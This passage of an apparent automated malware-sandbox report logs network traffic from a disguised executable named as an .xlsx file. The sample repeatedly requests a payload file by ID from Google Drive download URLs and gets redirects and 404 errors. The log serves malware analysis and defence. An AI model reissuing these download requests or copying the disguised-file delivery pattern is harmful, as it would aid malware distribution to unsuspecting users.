                                                                          Dec 16, 2024 18:07:40.164557934 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:40.165174961 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:40.165242910 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:40.167105913 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:40.167118073 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:40.167376041 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:40.167429924 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:40.167823076 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:40.215341091 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:41.060004950 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:41.060064077 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:41.060081005 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:41.060122967 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:41.060364008 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:41.060446024 CET44350027172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:41.060497999 CET50027443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:41.083637953 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:41.083683014 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:41.083740950 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:41.084661007 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:41.084675074 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:42.784385920 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:42.784564972 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:42.785248995 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:42.785265923 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:42.785470009 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:42.785475969 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:43.733170033 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:43.733355999 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:43.733546019 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:43.733630896 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:43.733644009 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:43.733695984 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:43.733728886 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:43.733777046 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:43.734832048 CET50028443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:43.734849930 CET44350028142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:53.788002968 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:53.788089037 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:53.792012930 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:53.796022892 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:53.796050072 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:55.496732950 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:55.496819019 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:55.499460936 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:55.499581099 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:55.512476921 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:55.512490988 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:55.512921095 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:55.512974977 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:55.521656990 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:55.567341089 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:56.403369904 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:56.403558969 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:56.403573036 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:56.403661013 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:56.403704882 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:56.403704882 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:56.930006981 CET50029443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:07:56.930032015 CET44350029172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:07:57.098874092 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:57.098937988 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:57.099025011 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:57.099447966 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:57.099467039 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:58.821723938 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:58.821858883 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:58.822277069 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:58.822283983 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:58.822447062 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:58.822452068 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757395983 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757460117 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:59.757484913 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757531881 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757534981 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:59.757564068 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757582903 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:59.757622957 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:59.757704973 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757790089 CET50030443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:07:59.757826090 CET44350030142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:07:59.757877111 CET50030443192.168.2.6142.250.181.1
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 16, 2024 18:05:16.772089005 CET6535253192.168.2.61.1.1.1
                                                                          Dec 16, 2024 18:05:16.916702986 CET53653521.1.1.1192.168.2.6
                                                                          Dec 16, 2024 18:05:19.658277035 CET6099553192.168.2.61.1.1.1
                                                                          Dec 16, 2024 18:05:19.797868967 CET53609951.1.1.1192.168.2.6
                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Dec 16, 2024 18:05:16.772089005 CET192.168.2.61.1.1.10x2162Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                          Dec 16, 2024 18:05:19.658277035 CET192.168.2.61.1.1.10x8e14Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Dec 16, 2024 18:04:49.411664009 CET1.1.1.1192.168.2.60xf29cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                          Dec 16, 2024 18:04:49.411664009 CET1.1.1.1192.168.2.60xf29cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                          Dec 16, 2024 18:05:16.916702986 CET1.1.1.1192.168.2.60x2162No error (0)drive.google.com172.217.19.174A (IP address)IN (0x0001)false
                                                                          Dec 16, 2024 18:05:19.797868967 CET1.1.1.1192.168.2.60x8e14No error (0)drive.usercontent.google.com142.250.181.1A (IP address)IN (0x0001)false
                                                                          • drive.google.com
                                                                          • drive.usercontent.google.com
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.649756172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:05:18 UTC216OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          2024-12-16 17:05:19 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:05:19 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: script-src 'nonce-o6BqJYO8T-R9gl-q3pXvaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.649764142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:05:21 UTC258OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          2024-12-16 17:05:22 UTC2218INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC7otclPp6kUkj9Txte22X9qcUBAFq6kX4UIMZ89XpCixvR11jxcht3Cm_q4Y8I59C_z
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:05:22 GMT
                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-QAxJTfIpNBUuOSTsK97zCg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Set-Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU; expires=Tue, 17-Jun-2025 17:05:22 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:05:22 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 68 55 50 6c 79 34 37 43 67 37 68 41 72 71 6e 50 63 30 34 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0hUPly47Cg7hArqnPc04NQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.649806172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:05:34 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:05:35 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:05:34 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-zr-l1QJ0IIg4AoWFS07NDA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.649811142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:05:37 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:05:37 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC65-DEoJXWYw4Izsi7h2NiMRHNiFvluyONc8W2NVZI2wKz7M8kG3U6XTPZ4NWYWCzOj
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:05:37 GMT
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-MxBkN0_e0DXXEWZnj9Toqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2024-12-16 17:05:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 71 55 4e 70 48 62 49 58 45 59 72 4b 39 6d 34 64 54 43 41 6a 36 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="qUNpHbIXEYrK9m4dTCAj6A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.649843172.217.19.1744435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:05:49 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:05:50 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:05:50 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-OLuLsJifv613kyc3N3ukKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.649852142.250.181.14435412C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-16 17:05:52 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
                                                                          2024-12-16 17:05:53 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC5Cg-gtBAGLfPXSXvdGgeRxlrSs786ui4JbkTpH2jwIBoqnyKIokNII-bibXZaZeYjk
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Mon, 16 Dec 2024 17:05:53 GMT
